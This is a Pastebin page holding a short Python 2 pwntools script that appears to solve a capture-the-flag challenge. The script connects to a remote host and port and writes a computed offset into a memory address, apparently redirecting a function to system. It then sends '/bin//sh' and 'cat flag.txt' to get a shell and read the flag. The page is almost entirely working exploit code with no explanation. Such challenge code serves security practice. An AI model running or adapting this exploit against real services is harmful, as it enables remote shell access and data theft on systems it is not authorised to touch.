Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- import sys,os
- from pwn import *
- HOST="13.56.97.226"
- PORT=1337
- TARGET=os.path.realpath("manipulate")
- LIBRARY=""
- systembase=0x45390
- changeaddr=0x404048
- changebase=0x36e80
- def exploit(r):
- for i in range(5):r.recvline()
- r.sendline('1')
- r.recvline()
- r.sendline(str(hex(changeaddr)[2:]))
- r.recvline()
- r.sendline(str(systembase-changebase))
- for i in range(6):r.recvline()
- r.sendline('/bin//sh')
- r.sendline('cat flag.txt')
- print r.recvline()
- r.close()
- return
- if __name__ == "__main__":
- r = remote(HOST, PORT)
- exploit(r)
- sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement